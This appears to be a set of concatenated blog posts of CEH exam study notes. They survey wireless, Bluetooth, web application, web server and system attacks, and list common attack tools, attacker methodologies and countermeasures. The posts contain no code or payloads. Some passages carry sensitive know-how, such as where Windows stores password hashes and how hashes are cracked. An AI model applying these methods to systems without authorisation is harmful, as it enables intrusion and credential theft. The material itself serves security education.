  • Launch wireless attacks: Using a tool like Aircrack-ng to run one or multiple of the possible attacks against a wireless network.

Bluetooth Hacking

Bluetooth is a wireless technology which is found in pretty much every phone you can get your hands on. But it is also in many other devices and gadgets around the home and the office, such as laptops, speakers, headphones and more. Bluetooth is used to connect devices that are in close proximity, cutting down on cables and giving you flexibility and freedom. Bluetooth is designed to allow devices to communicate wirelessly with each other over relatively short distances. It typically works over a range of fewer than 100 meters. The range has been intentionally limited in order to keep its power drain to a minimum. Bluetooth operates at 2.4 GHz frequency.

Bluetooth has a discovery feature that enables devices to be discoverable by other Bluetooth devices.

Bluetooth Attacks

  • BlueSmacking: Basically, a DoS attack against a Bluetooth device overflowing it with random packets, for example, echo packets.
  • BlueBugging: In this type of attacks, attackers exploit devices to gain access and compromise their security.
  • BlueJacking: It is the act of sending unsolicited messages to Bluetooth enabled devices.
  • BluePrinting: It is a method or technique to extract information and details about a remote device. Information such as firmware, manufacturers information, model, etc.
  • BlueSnarfing: Exploiting security vulnerabilities, attackers steal the information on Bluetooth devices.

Bluetooth Countermeasures

  • Keep checking the paired devices list.
  • Keep devices in non-discoverable mode.
  • Use a strong ping pattern.
  • Use encryption.
  • Install host-based security.
  • Do not accept an unknown or suspectable request.
  • When idle, keep your Bluetooth disabled.

Wireless Security Tools

Wireless Intrusion Prevention Systems

A wireless intrusion prevention system (WIPS) operates at the Layer 2 (data link layer) level of the Open Systems Interconnection model. WIPS can detect the presence of rogue or misconfigured devices and can prevent them from operating on wireless enterprise networks by scanning the network’s RFs for denial of service and other forms of attack.

WIDS monitors the radio spectrum for the presence of unauthorized, rogue access points and the use of wireless attack tools. The system monitors the radio spectrum used by wireless LANs, and immediately alerts a systems administrator whenever a rogue access point is detected. Conventionally it is achieved by comparing the MAC address of the participating wireless devices.

Wi-Fi Security Auditing Tool

There are several tools that can use defenders to audit, troubleshoot, detect, prevent intrusions, mitigate threats, detect rogue, protect against day-zero threats, investigate incidents (forensics) and create compliance reports helping to protect wireless networks. Tools like:

  • AirMagnet Wi-Fi Analyser
  • Motorola’s AirDefens Service Platform (ADSP)
  • Cisco Adaptive Wireless IPS
  • Aruba RFProtect

In addition, SANS has a whitepaper with the tittle Wireless Network Audits using Open Source tools.

Countermeasures

Multiple techniques and practices can be tacking to prevent attacks on wireless networks, some of them already discussed previously such as using monitoring and auditing tools, configuring strict access control policies, following best practices and techniques and, using appropriate encryption like WPA2 and strong authentication. Some of these basic techniques are:

  • Access point scanning
  • Change default parameters
  • Disable remote login for wireless devices
  • Wireless IPS deployment
  • Configuring WPA2 with AES for data protection
  • Choose strong passwords
  • RF scanning
  • MAC filtering
  • Disable SSID broadcast
  • Update software and patches
  • Blocking rogue access points
  • Per-packet authentication
  • Strong authentication
  • Enable firewall protection
  • Network management software
CEH (XVII): Hacking Wireless Networks

CEH (XV): Hacking Web Applications

The index of this series of articles can be found here.

Hundreds, thousands, millions, billions of systems are online nowadays, they offer services to their users and, in some cases, i.e. critical systems, they are indispensable. Some of these online services are web applications running on web servers. Organisations have embraced them and, they are not just used in the corporate sector to perform important and, some times, critical tasks, they have expanded globally for social and entertainment purposes.

Web applications present a great security challenge. They need high availability and smooth performance but, they are always exposed to a big number of users. For all these reasons, ensure security measures and eliminate vulnerabilities is crucial.

Some Concepts

A web application is an application that runs on a remote server and it is available to clients over the Internet. This access is offered through clients, sometimes just the browser or specialised client software. These clients can be very complex having code or logic on their own or dummy clients where all the logic resides at the server.

Server Administrator

It is the person who takes care of the webserver in terms of safety, security, functioning and performance. It is responsible for estimating security measures and deploying security models, finding and eliminating vulnerabilities.

Application Administrator

It is the person responsible for the management and configuration required for the web application. It ensures the availability and high performance of the web application.

Client

Clients are designed to interact with the web applications and they can range from simple dummy clients to very complex ones.

Web Application Threats

Multiple different threats apply to web applications:

  • Insecure storage: The software stores sensitive information without properly limiting read or write access by unauthorized actors.
  • Information leakage: Information leakage happens whenever a system that is designed to be closed to an eavesdropper reveals some information to unauthorized parties nonetheless.
  • Directory traversal: Directory traversal or Path Traversal is an HTTP attack which allows attackers to access restricted directories and execute commands outside of the web server’s root directory.
  • Parameter/Form tampering: Parameter tampering is a form of web-based attack in which certain parameters in the Uniform Resource Locator (URL) or web page form field data entered by a user is changed without that user’s authorization.
  • DoS Attacks: A denial-of-service attack (DoS attack) is a cyber-attack in which the perpetrator seeks to make a machine or network resource unavailable to its intended users by temporarily or indefinitely disrupting services of a host connected to the Internet.
  • Buffer overflow: Buffer overflow is an anomaly that occurs when software writing data to a buffer overflows the buffer’s capacity, resulting in adjacent memory locations being overwritten. In other words, too much information is being passed into a container that does not have enough space, and that information ends up replacing data in adjacent containers.
  • Log tampering: Weblogs tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behaviour. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern.
  • Injection: Injection is the placement of malicious code via an input.
    • SQL injection: SQL injection is the placement of malicious code in SQL statements, via web page input.
    • Command injection: Command injection is an attack in which the goal is the execution of arbitrary commands on the host operating system via a vulnerable application.
    • LDAP injection: LDAP injection is a crafted query that can manipulate vulnerable LDAP servers, leading to serious cases of data and identity theft.
    • SMTP injection
    • XPath injection
  • Cross-site scripting: Cross-site scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites.
  • Cross-site request forgery: Cross-site request forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated.
  • Security misconfiguration: Security misconfiguration is simply defined as failing to implement all the security controls for a server or web application or implementing the security controls, but doing so with errors.
  • Broken session management: Weakness of the session management systems like:
    • User authentication credentials are not protected when stored.
    • Predictable login credentials.
    • Session IDs are exposed in the URL.
    • Session IDs are vulnerable to session fixation attacks.
    • Session value does not timeout or does not get invalidated after logout.
    • Session IDs are not rotated after successful login.
    • Passwords, session IDs, and other credentials are sent over unencrypted connections.
  • DMZ attack: Attack attempts to take down and bypass a DMZ.
  • Session Hijacking: The Session Hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server.
  • Network Access Attacks: Everything that covers an attempt to access another user account or network device through improper means.

Web Application Pentesting

One of the tools security professionals have to prevent attacks is pentesting. In a pentest, security professional tries to take the place of an attacker and break into systems to, posteriorly fix that problem before they get exploited. Pentest try to covert the same ground attacker would cover:

  • Collection of information
  • Configuration testing
  • Authentication testing
  • Session testing
  • Authorisation testing
  • Data validation
  • DoS testing
  • Web services testing
  • Document findings

Web Application Attack Methodology

  • Analyse web application: Observing the functionality and input parameters to identify vulnerabilities, entry points and server technologies that can be exploited. HTTP request and HTTP fingerprinting techniques are used to diagnose their parameters.
  • Attack authentication mechanism: Trying to bypass authentication. Some attack mechanisms are:
    • User enumeration
    • Cookie exploitation
    • Session attacks
    • Passwords attacks
  • Authorisation attack schemes: Using different techniques to manipulate URLs, requests, POST data, query strings, cookies, parameters, HTTP headers, etc. to escalate privileges once low-level access has been achieved.
  • Session management attack: There are different techniques that can be used to impersonate a legitimate user:
    • Session token prediction
    • Session token tampering
    • Man-in-the-middle attack
    • Session replay
  • Attack data connectivity: Design to exploit the connection between a server and a database. It includes:
    • Connection string injection
    • Connection string parameters pollution (CSPP)
    • Connection Pool DoS

Countermeasures

There are literally hundreds of things that can be done to try to mitigate web application attacks. They can not be just listed but, a great starting point could be the OWASP Top 10 project where are explained to top ten more common vulnerabilities, how they work and possible ways to mitigate them.

CEH (XV): Hacking Web Applications

CEH (XIV): Hacking Web Servers

The index of this series of articles can be found here.

A web server is server software or hardware dedicated to running this software, that can satisfy client requests on the World Wide Web. A web server can, in general, contain one or more websites. A web server processes incoming network requests over HTTP and several other related protocols. The primary function of a web server is to store, process and deliver web pages to clients.

On the hardware side, a web server is a computer that stores web server software and a website’s component files (e.g. HTML documents, images, CSS stylesheets, and JavaScript files). It is connected to the Internet and supports physical data interchange with other devices connected to the web.

On the software side, a web server includes several parts that control how web users access hosted files, at a minimum an HTTP server. An HTTP server is a piece of software that understands URLs and HTTP. It can be accessed through the domain names and, it stores and delivers their content to the end-users device.

Some Concepts

Web Server Security Issue

Security issues for web server may include network-level and operative system-level attacks. Usually, attackers target vulnerabilities or mistakes in the configuration and exploit them. These vulnerabilities may include:

  • Improper permissions of file directories
  • Default configurations
  • Unnecessary services enabled
  • Lack of security
  • Bugs
  • Misconfigured SSL certificates
  • Enabled debugging

Once a web server has been compromised it can result in compromising all user accounts, DoS offered by the server, defacement, launching further attacks using the compromised web server and access to resources and data.

Open Source Web Servers

They are servers where the code is available to the public and maintained by communities like open source. they can be hosted on-premises or by third-party companies. Example are:

  • Apache HTTP Server
  • NGINX
  • Apache Tomcat
  • Lighttpd
  • Node.js

IIS Web Server

Internet Information Service (IIS) is a windows-based service which provides a request processing architecture. IIS contains multiple components which are responsible for several functions such as listening to the request, managing processes, reading configuration files, etc. Some of these components are:

  • Protocol listener: Protocol listeners are responsible for receiving protocol-specific requests. They forward these requests to IIS for processing and then return responses to requestors.
  • HTTP.sys: HTTP listeners are implemented as a kernel-mode service device driver called the HTTP protocol stack (HTTP.sys). HTTP.sys is responsible for listening HTTP requests, forwarding these requests to IIS for processing and then, return processed responses to client browsers.
  • WWW Service and WAS: World Wide Web Publishing Service (WWW Service) and Windows Processing Activation Service (WAS) run _svchost.exe_ on the local system and share same binaries. WWW Service was used previously to version 7, whereas in version 7 and later WAS is used.
IIS

Web Server Attacks

A lot of attack techniques can be found for web serves, some of them are listed below:

  • DoS/DDoS attack: Used to flood fake requests toward the web server resulting in the crashing, unavailability or denial of service for all users.
  • DNS server hijacking: By compromising the DNS configuration, attackers can redirect request targeting a web server to a malicious server owned or controlled by them.
  • DNS amplification attack: Using the DSN recursive method, attackers can, by spoofing the lookup requests and amplifying the size of the request, originate DDoS attacks.
  • Directory traversal attacks: Using trial and error methods, attackers ca access restricted directories using dots and slashes sequences revealing sensitive information.
  • Man-in-the-middle/sniffing attacks: Attacker can extract and intercept sensitive information or altering packets.
  • Phishing attacks: Using phishing attacks, attackers can compromise legitimate user credentials to compromise a web server.
  • Website defacement: After a successful intrusion, attackers can alter or modify the content or appearance of a website.
  • Web server misconfiguration: Default features or credentials, misconfigurations, default certificates, active debugging capabilities, unnecessary services running, etc. All of this can help attackers to compromise a web server.
  • HTTP response splitting attacks: HTTP response splitting is a form of web application vulnerability, resulting from the failure of the application or its environment to properly sanitize input values. The attack consists of making the server print a carriage return (CR, ASCII 0x0D) line feed (LF, ASCII 0x0A) sequence followed by content supplied by the attacker in the header section of its response, typically by including them in input fields sent to the application. Per the HTTP standard, headers are separated by one CRLF and the response’s headers are separated from its body by two. Therefore, the failure to remove CRs and LFs allows the attacker to set arbitrary headers, take control of the body, or break the response into two or more separate responses—hence the name.
  • Web cache poisoning attacks: In this attack, attackers wipe the cache of the web server and store fake entries by sending crafted requests into the cache to redirect users to malicious websites.
  • SSH brute-force attacks: Obtaining access to unauthorised systems by forcing the brute-forcing the access to an available SSH tunnel.
  • Web application attacks: Web servers run web application among others. A vulnerability in any pf the application can be used or affect a web server.

Web Server Attack Methodology

  • Web server footprinting: It includes footprinting focused on a web server using different tools like Maltego, Netcraft, Httprecon, etc. Usually, allows discovering server name, type, operative system, running applications and other interesting information about the target.
  • Mirroring a website: Download a copy of an entire website to explore it and try to find vulnerabilities avoiding the constant contact with the web server.
  • Vulnerability scanner: Vulnerability scanners are automated tools specially designed and built to find vulnerabilities, weakness, problems and holes on the operative system, network, software or applications. These tools perform a deep inspection of scripts, open ports, banners, running services, configuration and other areas.
  • Session Hijacking: As established before, steal some legitimate session to access the web server.
  • Hacking web passwords: Password cracking is one very common technique where attackers to break the security of the credentials using different methods like:
    • Non-electronic attacks
    • Active online attacks
    • Passive online attacks
    • Default passwords
    • Offline attacks

Countermeasures

The basic recommendation is to place the web servers on a secure zone protected by appropriate tools like we have seen in previous chapters, IDS, firewalls. Placing the server into an isolated zone like a DMZ can protect them from threats.

A few specific measures can be:

  • Auditing ports
  • Disabling insecure and unnecessary ports
  • Using port 443 HTTPS over 80 HTTP
  • Encrypted traffic
  • Server certificates
  • Code access security policies
  • Disable tracing
  • Disable debug compiles

Patch Management

A very important action to be taken to maintain web servers secure is to have a patch management policy to be able to incorporate updates or hotfixes fixing known security problems.

This process can be manual or automatic, with a preference for the second one. A patch management system should perform the next tasks:

  1. Detect missing security patches
  2. Find out the solution
  3. Download the patch
  4. Test the patch in an isolated environment
  5. Deploy the patch into the rest of the systems
CEH (XIV): Hacking Web Servers

CEH (VII): System Hacking

The index of this series of articles can be found here.

At this point, attackers have gathered enough information or should have gathered enough information, to try to compromise the target systems.

This is, without questions, the most difficult phase of an attack or a pentest. In both cases, it is needed patience, tenacity and perseverance. Failures are going to happen, theories are going to be proven wrong, mistakes are going to be made and disappointments are going to happen. After all of this, maybe, attackers or security professionals will get some results. But, as Thomas Edison said, “I did not fail. I just found 2,000 ways not to make a lightbulb; I only needed to find one way to make it work.”. Attackers do not fail, they just need to find one way to compromise the system to achieve their objective.

Compromising a system is not a matter of, if it will be or not, it is just about the time and resources necessary to compromise it. Security professionals try to increase the time needed as much as possible and attackers reduce it as much as they can. A system will never be completely secure but, if it is secure enough, the time and resources that need to be invested will not be worth it. Still, there will be attempts just for fun, curiosity or as a challenge but, the ratio of potentially serious attacks will be lower.

Compromise a system is a very broad term. The intentions of an attacker when compromising a system are:

  • Gain access
  • Privileges escalation
  • Maintain remote access
  • Steal information, data or any other type of asset
  • Clean and hiding pieces of evidence of the attack

There are multiple system hacking methodologies that, at least, include the next steps and match the concept of compromise a system:

  1. Cracking passwords
  2. Escalating privileges
  3. Executing applications
  4. Hiden files
  5. Covering tracks

Password Cracking

It is said that a secure system should base its strengthness on three factors:

  • Something the user knows, like credentials i.e. username and password.
  • Something the user is, like biometrics.
  • Something the user has, like a security card or a token generator.

The implementation of the three mechanisms is, maybe, a not simple approach and only very secure systems use it. And, nowadays, there is a tendency on the use of second-factor authentication, usually based on something the user knows and something the user has. This is an excellent tendency that it should be mainstream. But, the unfortunate reality is that a lot of systems are just protected by a pair os username and password.

If attackers have been diligent enough, at this point, they will have a list of enumerated usernames to try in the target systems. At this point, it is where password cracking plays an important part. Guessable passwords, short passwords, passwords with weak encryption, simple passwords with only letters and or numbers make it easy for attackers to crack them.

The best defence against these cracking password techniques is to have a strong lengthy and difficult password to guess. Typically, a good password contains:

  • Case sensitive letters
  • Special characters
  • Numbers
  • At least, 8 characters length if not more

Types of Password Attacks

Non-Electronic Attacks

Attackers do not need any technical knowledge or tool to perform this attack. Things like:

  • Shoulder Surfing
  • Social Engineering
  • Dumpster Diving

Active Online Attacks

Attackers perform password cracking by directly communicating with the victim machine.

  • Dictionary attack: The dictionary attack, as its name suggests, is a method that uses an index of words that feature most commonly as user passwords. This is a slightly less-sophisticated version of the brute force attack but it still relies on hackers bombarding a system with guesses until something sticks.
  • Brute force attack: Similar in function to the dictionary attack, the brute force attack is regarded as being a little more sophisticated. Rather than using a list of words, brute force attacks are able to detect non-dictionary terms, such as alpha-numeric combinations. This means passwords that include strings such as “aaa1” or “zzz10” could be at risk from a brute force attack.
  • Hash Injection: A pass the hash attack is an exploit in which an attacker steals a hashed user credential and, without cracking it, reuses it to trick an authentication system into creating a new authenticated session on the same network.
  • Phishing: There is an easy way to hack: ask the user for his or her password. A phishing email leads the unsuspecting reader to a faked log in page associated with whatever service it is the hacker wants to access, requesting the user to put right some terrible problem with their security. That page then skims their password and the hacker can go use it for their own purpose.
  • Malware: A keylogger, or screen scraper, can be installed by malware which records everything users type or takes screenshots during a login process, and then forwards a copy of this file to hacker central.
  • Password Guessing: The password crackers best friend, of course, is the predictability of the user. Unless a truly random password has been created using software dedicated to the task, a user-generated random’ password is unlikely to be anything of the sort. Instead, thanks to our brains’ emotional attachment to things we like, the chances are those random passwords are based upon our interests, hobbies, pets, family and so on. In fact, passwords tend to be based on all the things we like to chat about on social networks and even include in our profiles.

Passive Online Attacks

Attackers perform password cracking without communicating with the authorizing party.

  • Wire Sniffing: Sniffing attack or a sniffer attack, in context of network security, corresponds to theft or interception of data by capturing the network traffic using a sniffer (an application aimed at capturing network packets). When data is transmitted across networks, if the data packets are not encrypted, the data within the network packet can be read using a sniffer. Using a sniffer application, an attacker can analyze the network and gain information to eventually cause the network to crash or to become corrupted, or read the communications happening across the network.
  • Man-in-the-Middle: A man-in-the-middle attack (MITM) is an attack where the attacker secretly relays and possibly alters the communications between two parties who believe that they are directly communicating with each other. The attacker must be able to intercept all relevant messages passing between the two victims and inject new ones. This is straightforward in many circumstances; for example, an attacker within the reception range of an unencrypted wireless access point (Wi-Fi) could insert themselves as a man-in-the-middle.
  • Replay Attack: A replay attack (also known as playback attack) is a form of network attack in which valid data transmission is maliciously or fraudulently repeated or delayed. This is carried out either by the originator or by an adversary who intercepts the data and re-transmits it, possibly as part of a masquerade attack by IP packet substitution. This is one of the lower-tier versions of a Man-in-the-middle attack.

Default Password

As mentioned before, a default password is supplied by the manufacturer with new equipment (e.i. switches, hubs, routers) that is password protected. Attackers can easily find lists with compilations of these passwords and use them to access a system.

Offline Attack

Attacker copies the target’s password file and then tries to crack passwords in his own system at a different location.

  • Pre-Computed Hashes and Rainbow Tables: Rainbow tables might sound innocuous, but they are in fact incredibly useful tools in a hacker’s arsenal. When passwords are stored on a computer system, they are hashed using encryption – the 1-way nature of this process means that it is impossible to see what the password is without the associated hash. Simply put, rainbow tables function as a pre-computed database of passwords and their corresponding hash values. This will then be used as an index to cross-reference hashes found on a computer with those already pre-computed in the rainbow table. Compared to a brute force attack, which does a lot of the computation during the operation, rainbow tables boil the attack down to just a search through a table.
  • Distributed Network: A Distributed Network Attack (DNA) technique is used for recovering passwords from hashes or password-protected files using the unused processing power of machines across the network to decrypt passwords. The DNA Manager is installed in a central location where machines running on DNA Client can access it over the network. DNA Manager coordinates the attack and allocates small portions of the key search to machines that are distributed over the network. DNA Client runs in the background, consuming only unused processor time. The program combines the processing capabilities of all the clients connected to the network and uses it to crack the password.

USB Drive

For this attack, the attacker needs physical access to the target machine. The attacker will insert a USB drive previously prepared with a password cracker tool and an autorun mechanism on the targeted computer. Once the device is connected the tool will try to crack the password.

Authentication mechanisms

In computer environments, authentication is the verification process to identify a user or device to probe it has legitimate access right to resources. This avoids impostors making use of or accessing resources they should not be allowed ensuring the authentication of users, computers and services.

Microsoft platform implements multiple authentication protocols, among them we can find:

  • Kerberos
  • Security Account Manager (SAM)
  • NT LAN Manager (NTLM)

Kerberos

Kerberos is a network authentication protocol. It is designed to provide strong authentication for client/server applications by using secret-key cryptography. The Kerberos protocol uses strong cryptography so that a client can prove its identity to a server (and vice versa) across an insecure network connection. After a client and server have used Kerberos to prove their identity, they can also encrypt all of their communications to assure privacy and data integrity as they go about their business.

Here are the most basic steps taken to authenticate in a Kerberized environment.

  1. Client requests an authentication ticket (TGT) from the Key Distribution Center (KDC).
  2. The KDC verifies the credentials and sends back an encrypted TGT and session key.
  3. The TGT is encrypted using the Ticket Granting Service (TGS) secret key.
  4. The client stores the TGT and when it expires the local session manager will request another TGT (this process is transparent to the user).

If the Client is requesting access to a service or other resource on the network, this is the process:

  1. The client sends the current TGT to the TGS with the Service Principal Name (SPN) of the resource the client wants to access.
  2. The KDC verifies the TGT of the user and that the user has access to the service.
  3. TGS sends a valid session key for the service to the client.
  4. Client forwards the session key to the service to prove the user has access, and the service grants access.

Security Account Manager (SAM)

Windows stores and manages the local user and group accounts in a database file called SecurityAccount Manager (SAM). It authenticates local user logons. On a domain controller, it simply stores the administrator account from the time it was a server, which serves as the Directory Services Restore Mode (DSRM) recovery account.

In the SAM, each user account can be assigned a local area network (LAN) password and a Windows password. Both are encrypted. If someone attempts to log on to the system and the user name and associated passwords match an entry in the SAM, a sequence of events takes place ultimately allowing that person access to the system. If the user name or passwords do not properly match any entry in the SAM, an error message is returned requesting that the information be entered again.

In personal computers (PCs) not connected into a LAN and for which there is only one user, Windows asks for only one password when the system is booted up. This function can be disabled if the user does not want to enter authentication data every time the computer is switched on or restarted. The main purpose of the SAM in a PC environment is to make it difficult for a thief to access the data on a stolen machine. It can also provide some measure of security against online hackers.

The user passwords are stored in a hashed format in a registry hive either as an LM hash or as an NTLM hash. Windows XP or later versions do not store the value of LM hash or, if it exceeds fourteen characters, it stores blank or a dummy value instead. This file can be found in ‘%SystemRoot%/system32/config/SAM‘ and is mounted on ‘HKLM/SAM‘. This information is stored following the next format:

username:userId:LMHash:NTLMHash:::

NT LAN Manager (NTLM)

NT (New Technology) LAN Manager (NTLM) is a suite of Microsoft security protocols intended to provide authentication, integrity, and confidentiality to users.

NTLM is a challenge-response authentication protocol which uses three messages to authenticate a client in a connection-oriented environment (connectionless is similar), and a fourth additional message if integrity is desired.

  1. First, the client establishes a network path to the server and sends a ‘NEGOTIATE_MESSAGE‘ advertising its capabilities.
  2. Next, the server responds with ‘CHALLENGE_MESSAGE‘ which is used to establish the identity of the client.
  3. Finally, the client responds to the challenge with an ‘AUTHENTICATE_MESSAGE‘.

The NTLM authentication process can be observed in the image below.

NTML Authentication

Before Kerberos, Microsoft used NTLM technology. The biggest difference between the two systems is the third-party verification and stronger encryption capability in Kerberos. This extra step in the process provides a significant additional layer of security over NTLM.

Protecting Passwords

When passwords are stored they should not be stores as plain text, to avoid this, there are a few techniques that can be used:

  • Encryption: Encryption is the practice of scrambling information in a way that only someone with a corresponding key can unscramble and read it. Encryption is a two-way function. When users encrypt something, they are doing so with the intention to decrypting it later. To encrypt data it is used an algorithm – a series of well-defined steps that can be followed procedurally – to encrypt and decrypt information.
  • Hashing: Hashing is the practice of using an algorithm to map data of any size to a fixed length. This is called a hash value. Whereas encryption is a two-way function, hashing is a one-way function. While it is technically possible to reverse-hash something, the computing power required makes it unfeasible.
  • Salting: Salting is a concept that typically pertains to password hashing. Essentially, it is a unique value that can be added to the end of the password to create a different hash value. This adds a layer of security to the hashing process, specifically against brute force attacks.

Despite all these techniques, hashes can be cracked or, at least, there a few techniques that can try to crack a hash.

  • Dictionary and Brute Force Attacks: The simplest way to crack a hash is to try to guess the password, hashing each guess, and checking if the guess’s hash equals the hash being cracked. If the hashes are equal, the guess is the password. The two most common ways of guessing passwords are dictionary attacks and brute-force attacks.
  • Lookup Table: Lookup tables are an extremely effective method for cracking many hashes of the same type very quickly. The general idea is to pre-compute the hashes of the passwords in a password dictionary and store them, and their corresponding password, in a lookup table data structure. A good implementation of a lookup table can process hundreds of hash lookups per second, even when they contain many billions of hashes.
  • Reverse Lookup Tables: This attack allows an attacker to apply a dictionary or brute-force attack to many hashes at the same time, without having to pre-compute a lookup table. First, the attacker creates a lookup table that maps each password hash from the compromised user account database to a list of users who had that hash. The attacker then hashes each password guess and uses the lookup table to get a list of users whose password was the attacker’s guess. This attack is especially effective because it is common for many users to have the same password.
  • Rainbow Tables: Already seen it before but, rainbow tables are a time-memory trade-off technique. They are like lookup tables, except that they sacrifice hash cracking speed to make the lookup tables smaller. Because they are smaller, the solutions to more hashes can be stored in the same amount of space, making them more effective. Rainbow tables that can crack any md5 hash of a password up to 8 characters long exist.

Password Cracking Tools

There are a plethora of password cracking tools out there. A few of them are:

  • John the Ripper
  • Hashcat
  • THC Hydra
  • Medusa
  • Ophcrack

Escalating Privileges

Privilege escalation happens when a malicious user exploits a bug, design flaw, or configuration error in an application or operating system to gain elevated access to resources that should normally be unavailable to that user. The attacker can then use the newly gained privileges to steal confidential data, run administrative commands or deploy malware – and potentially do serious damage to a target operating system, server applications, organization, and reputation.

Attackers start by exploiting a privilege escalation vulnerability in a target system or application, which lets them override the limitations of the current user account. They can then access the functionality and data of another user (horizontal privilege escalation) or obtain elevated privileges, typically of a system administrator or other power user (vertical privilege escalation). Such privilege escalation is generally just one of the steps performed in preparation for the main attack.

While usually not the main aim of an attacker, privilege escalation is frequently used in preparation for a more specific attack, allowing intruders to deploy a malicious payload or execute malicious code in the targeted system. This means that whenever users detect or suspect privilege escalation, they also need to look for signs of other malicious activity. However, even without evidence of further attacks, any privilege escalation incident is an information security issue in itself, because someone could have gained unauthorized access to personal, confidential or otherwise sensitive data. In many cases, this will have to be reported internally or to the relevant authorities to ensure compliance.

To make matters worse, it can be hard to distinguish between routine and malicious activity to detect privilege escalation incidents. This is especially true for rogue users, who might legitimately perform malicious actions that compromise security. However, if security personal can quickly detect successfully or attempted privilege escalation, they have a good chance of stopping an attack before the intruders can establish a foothold to launch their main attack.

Horizontal Privileges Scalation

With horizontal privilege escalation, attackers remain on the same general user privilege level but can access data or functionality of other accounts or processes that should be unavailable to the current account or process. For example, this may mean using a compromised office workstation to gain access to other office users’ data. For web applications, one example of horizontal privilege escalation might be getting access to another user’s profile on a social site or e-commerce platform, or their bank account on an e-banking site.

Vertical Privileges Scalation

With vertical privilege escalation (also called privilege elevation), attackers start from a less privileged account and obtain the rights of a more powerful user – typically the administrator or system user on Microsoft Windows, or root on Unix and Linux systems. With these elevated privileges, the attacker can wreak all sorts of havoc on computer systems and applications: steal access credentials and other sensitive information, download and execute malware, erase data, or execute arbitrary code. Worse still, skilled attackers can use elevated privileges to cover their tracks by deleting access logs and other evidence of their activity. This can potentially leave the victim unaware that an attack took place at all. That way, cybercriminals can covertly steal information or plant malware directly in company systems.

When Escalation Success

Once attackers gain unauthorised access to a system and escalate privileges, now the next step of the attacker is to execute malicious applications on the target system to “own” the system. Attackers goals are:

  • Installation of malware to collect information: To do this, tools like ‘RemoteExec‘ or ‘PDQ Deploy‘ can be used.
  • To set up a backdoor to maintain access.
  • To crack existing passwords.
  • To install keyloggers for monitoring or capture user actions: I the access has been physical, it can be a hardware keylogger attached to the physical machine, otherwise, it can be a software keylogger.

Protecting from Privilege Escalation

Attackers can use many privilege escalation techniques to achieve their goals. But to attempt privilege escalation in the first place, they usually need to gain access to a less privileged user account. Possible protection measures are:

  • Enforce password policies.
  • Create specialized users and groups with minimum necessary privileges and file access.
  • Avoid common programming errors in applications.
  • Secure databases and sanitize user input.
  • Keep systems and applications patched and updated.
  • Ensure correct permissions for all files and directories.
  • Close unnecessary ports and remove the unused user accounts.
  • Remove or tightly restrict all file transfer functionality.
  • Change default credentials on all devices, including routers and printers.
  • Regularly scan systems and applications for vulnerabilities.

Spyware

Spyware is unwanted software that infiltrates computing devices, stealing internet usage data and sensitive information. Spyware is classified as a type of malware – malicious software designed to gain access to or damage computers, often without the owners’ knowledge. Spyware gathers personal information and relays it to advertisers, data firms, or external users.

Spyware is used for many purposes. Usually, it aims to track and sell users internet usage data, capture credit cards or bank account information, or steal personal identities monitoring internet activity, tracking log in and password information, and spying on sensitive information.

The most common types of spyware are:

  • Adware: This type of spyware tracks browser history and downloads, with the intent of predicting what products or services users are interested in. The adware will display advertisements for the same or related products or services to entice users to click or make a purchase. Adware is used for marketing purposes and can slow down computers.
  • System monitors: This type of spyware can capture just about everything users do on their computers. System monitors can record all keystrokes, emails, chat-room dialogues, websites visited, and programs run. System monitors are often disguised as freeware.
  • Tracking cookies: These track the user’s web activities, such as searches, history, and downloads, for marketing purposes.
  • Trojans: This kind of malicious software disguises itself as legitimate software. For example, Trojans may appear to be a Java or Flash Player update upon download. Trojan malware is controlled by third parties. It can be used to access sensitive information such as Social Security numbers and credit card information.

Some of the spyware features are:

  • Tracking users
  • Monitoring the user’s activity
  • Record conversations
  • Blocking applications and services
  • Remote delivery of logs
  • Email communication tracking
  • Recording removable media communications
  • Voice recording
  • Video recording
  • Tracking location

Rootkits

A rootkit is a clandestine computer program designed to provide continued privileged access to a computer while actively hiding its presence. The term rootkit is a connection between the two words “root” and “kit“. Originally, a rootkit was a collection of tools that enabled administrator-level access to a computer or network. Root refers to the Admin account on Unix and Linux systems, and kit refers to the software components that implement the tool. Today rootkits are generally associated with malware – such as Trojans, worms, viruses – that conceal their existence and actions from users and other system processes.

A rootkit allows someone to maintain command and control over a computer without the computer user/owner knowing about it. Once a rootkit has been installed, the controller of the rootkit has the ability to remotely execute files and change system configurations on the host machine. A rootkit on an infected computer can also access log files and spy on the legitimate computer owner’s usage.

Some different types of rootkits can be found classified in the below categories.

  • Hardware or firmware rootkit: The name of this type of rootkit comes from where it is installed on a computer. This type of malware could infect a computer’s hard drive or its system BIOS, the software that is installed on a small memory chip in the computer’s motherboard. It can even infect routers. Hackers can use these rootkits to intercept data written on the disk.
  • Bootloader rootkit: Computer’s bootloader is an important tool. It loads the computer’s operating system when it turns the machine on. A bootloader toolkit, then, attacks this system, replacing the computer’s legitimate bootloader with a hacked one. This means that this rootkit is activated even before the computer’s operating system turns on.
  • Memory rootkit: This type of rootkit hides in a computer’s Random Access Memory (RAM). These rootkits will carry out harmful activities in the background. These rootkits have a short lifespan. They only live in the computer’s RAM and will disappear once the system reboots – though sometimes further work is required to get rid of them.
  • Application rootkit: Application rootkits replace standard files in a computer with rootkit files. They might also change the way standard applications work. These rootkits might infect programs such as Word, Paint, or Notepad. Every time users run these programs, they will give hackers access to their computer. The challenge here is that the infected programs will still run normally, making it difficult for users to detect the rootkit.
  • Kernel-mode rootkits: These rootkits target the core of a computer’s operating system. Cybercriminals can use these to change how an operating system functions. They just need to add their own code to it. This can give them easy access to a computer and make it easy for them to steal personal information.

Detecting and Defending Rootkits

Because rootkits are so dangerous and so difficult to detect, it is important to exercise caution when surfing the internet or downloading programs. There is no way to magically protect systems from all rootkits. It is difficult to detect rootkits. There are no commercial products available that can find and remove all known and unknown rootkits. There are various ways to look for a rootkit on an infected machine. Detection methods include behavioural-based methods (e.g., looking for strange behaviour on a computer system), signature scanning and memory dump analysis. Often, the only option to remove a rootkit is to completely rebuild the compromised system.

Fortunately, the odds of avoiding these attacks can be increased by following the same common-sense strategies usually are taken to avoid all computer viruses, including these.

